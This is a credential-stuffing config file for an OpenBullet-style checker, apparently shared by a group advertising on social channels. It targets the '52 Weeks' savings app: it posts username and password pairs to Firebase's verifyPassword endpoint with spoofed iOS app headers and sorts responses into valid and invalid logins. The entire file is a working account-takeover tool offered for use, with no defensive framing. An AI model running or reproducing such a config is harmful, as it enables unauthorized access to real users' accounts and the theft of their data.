[SETTINGS]
{
  "Name": "52 Weeks {CASHOUT}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-11T01:57:48.2756462-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MasterLordConfigs",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "I NEED NETFLIX HITS VS VHQ PROXY > @MasterLord007",
      "VariableName": "",
      "Id": 1514944397
    },
    {
      "Description": "JOIN > @MasterLordConfigs",
      "VariableName": "",
      "Id": 846897703
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "52 Weeks {CASHOUT}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key=AIzaSyC1jt_LObH-G3UirfgY23GRxgIiBMOISvg" 
  CONTENT "{\"email\":\"<USER>\",\"returnSecureToken\":true,\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: www.googleapis.com" 
  HEADER "Content-Type: application/json" 
  HEADER "Accept: */*" 
  HEADER "X-Ios-Bundle-Identifier: com.mobills.fiftytwoweeks" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/8.4.0/FirebaseCore-iOS" 
  HEADER "User-Agent: FirebaseAuth.iOS/8.4.0 com.mobills.fiftytwoweeks/2.4.2 iPhone/12.4.3 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 
  HEADER "Content-Length: 81" 
  HEADER "Accept-Encoding: br, gzip, deflate" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "EMAIL_NOT_FOUND" 
    KEY "INVALID_PASSWORD" 
    KEY "INVALID_EMAIL" 
    KEY "MISSING_PASSWORD" 
  KEYCHAIN Success OR 
    KEY "kind" 

#CREATOR FUNCTION Constant "@MasterLordConfigs" -> CAP "Config By" 

